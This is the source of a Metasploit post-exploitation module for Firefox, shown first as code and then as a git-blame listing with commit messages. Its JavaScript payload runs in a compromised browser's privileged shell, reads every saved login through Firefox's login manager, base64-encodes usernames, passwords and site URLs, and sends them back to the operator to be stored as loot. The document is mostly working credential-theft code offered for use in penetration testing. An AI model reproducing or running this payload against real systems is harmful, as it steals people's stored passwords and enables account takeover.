metasploit-framework/modules/post/firefox/gather/passwords.rb

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'json'
require 'msf/core'
require 'msf/core/payload/firefox'

class Metasploit3 < Msf::Post

  include Msf::Payload::Firefox
  include Msf::Exploit::Remote::FirefoxPrivilegeEscalation

  def initialize(info={})
    super(update_info(info,
      'Name'          => 'Firefox Gather Passwords from Privileged Javascript Shell',
      'Description'   => %q{
        This module allows collection of passwords from a Firefox Privileged Javascript Shell.
      },
      'License'       => MSF_LICENSE,
      'Author'        => [ 'joev' ],
      'DisclosureDate' => 'Apr 11 2014'
    ))

    register_options([
      OptInt.new('TIMEOUT', [true, "Maximum time (seconds) to wait for a response", 90])
    ], self.class)
  end

  def run
    results = js_exec(js_payload)
    if results.present?
      begin
        passwords = JSON.parse(results)
        passwords.each do |entry|
          entry.keys.each { |k| entry[k] = Rex::Text.decode_base64(entry[k]) }
        end

        if passwords.length > 0
          file = store_loot("firefox.passwords.json", "text/json", rhost, passwords.to_json)
          print_good("Saved #{passwords.length} passwords to #{file}")
        else
          print_warning("No passwords were found in Firefox.")
        end
      rescue JSON::ParserError => e
        print_warning(results)
      end
    end
  end

  def js_payload
    %Q|
      (function(send){
        try {
          var manager = Components
                          .classes["@mozilla.org/login-manager;1"]
                          .getService(Components.interfaces.nsILoginManager);
          var logins = manager.getAllLogins();
          var passwords = [];
          var b64 = Components.utils.import("resource://gre/modules/Services.jsm").btoa;
          var fields = ['password', 'passwordField', 'username', 'usernameField',
                        'httpRealm', 'formSubmitURL', 'hostname'];

          var sanitize = function(passwdObj) {
            var sanitized = { };
            for (var i in fields) {
              sanitized[fields[i]] = b64(passwdObj[fields[i]]);
            }
            return sanitized;
          }

          // Find user from returned array of nsILoginInfo objects
          for (var i = 0; i < logins.length; i++) {
            passwords.push(sanitize(logins[i]));
          }

          send(JSON.stringify(passwords));
        } catch (e) {
          send(e);
        }
      })(send);
    |.strip
  end
end
Add password colletion post module for Firefox shells. 2014-04-11 21:15:48 +00:00			`##`
			`# This module requires Metasploit: http//metasploit.com/download`
			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

			`require 'json'`
			`require 'msf/core'`
			`require 'msf/core/payload/firefox'`

			`class Metasploit3 < Msf::Post`

			`include Msf::Payload::Firefox`
			`include Msf::Exploit::Remote::FirefoxPrivilegeEscalation`

			`def initialize(info={})`
			`super(update_info(info,`
			`'Name' => 'Firefox Gather Passwords from Privileged Javascript Shell',`
			`'Description' => %q{`
			`This module allows collection of passwords from a Firefox Privileged Javascript Shell.`
			`},`
			`'License' => MSF_LICENSE,`
			`'Author' => [ 'joev' ],`
Fix wrong DisclosureDate. 2014-04-11 21:17:22 +00:00			`'DisclosureDate' => 'Apr 11 2014'`
Add password colletion post module for Firefox shells. 2014-04-11 21:15:48 +00:00			`))`

			`register_options([`
			`OptInt.new('TIMEOUT', [true, "Maximum time (seconds) to wait for a response", 90])`
			`], self.class)`
			`end`

			`def run`
Refactors firefox js usage into a mixin. 2014-04-24 20:07:48 +00:00			`results = js_exec(js_payload)`
Add password colletion post module for Firefox shells. 2014-04-11 21:15:48 +00:00			`if results.present?`
			`begin`
			`passwords = JSON.parse(results)`
Add base64 to prevent potential encoding issues. 2014-04-11 22:30:04 +00:00			`passwords.each do \|entry\|`
			`entry.keys.each { \|k\| entry[k] = Rex::Text.decode_base64(entry[k]) }`
			`end`

Make window invisible. 2014-06-06 21:40:55 +00:00			`if passwords.length > 0`
			`file = store_loot("firefox.passwords.json", "text/json", rhost, passwords.to_json)`
			`print_good("Saved #{passwords.length} passwords to #{file}")`
			`else`
			`print_warning("No passwords were found in Firefox.")`
			`end`
Add password colletion post module for Firefox shells. 2014-04-11 21:15:48 +00:00			`rescue JSON::ParserError => e`
			`print_warning(results)`
			`end`
			`end`
			`end`

			`def js_payload`
			`%Q\|`
			`(function(send){`
			`try {`
			`var manager = Components`
			`.classes["@mozilla.org/login-manager;1"]`
			`.getService(Components.interfaces.nsILoginManager);`
			`var logins = manager.getAllLogins();`
			`var passwords = [];`
Add base64 to prevent potential encoding issues. 2014-04-11 22:30:04 +00:00			`var b64 = Components.utils.import("resource://gre/modules/Services.jsm").btoa;`
Add password colletion post module for Firefox shells. 2014-04-11 21:15:48 +00:00			`var fields = ['password', 'passwordField', 'username', 'usernameField',`
			`'httpRealm', 'formSubmitURL', 'hostname'];`

			`var sanitize = function(passwdObj) {`
			`var sanitized = { };`
Add base64 to prevent potential encoding issues. 2014-04-11 22:30:04 +00:00			`for (var i in fields) {`
			`sanitized[fields[i]] = b64(passwdObj[fields[i]]);`
			`}`
Add password colletion post module for Firefox shells. 2014-04-11 21:15:48 +00:00			`return sanitized;`
			`}`
Errant whitespace 2014-04-14 18:34:39 +00:00
Add password colletion post module for Firefox shells. 2014-04-11 21:15:48 +00:00			`// Find user from returned array of nsILoginInfo objects`
			`for (var i = 0; i < logins.length; i++) {`
			`passwords.push(sanitize(logins[i]));`
			`}`

			`send(JSON.stringify(passwords));`
			`} catch (e) {`
			`send(e);`
			`}`
			`})(send);`
			`\|.strip`
			`end`
			`end`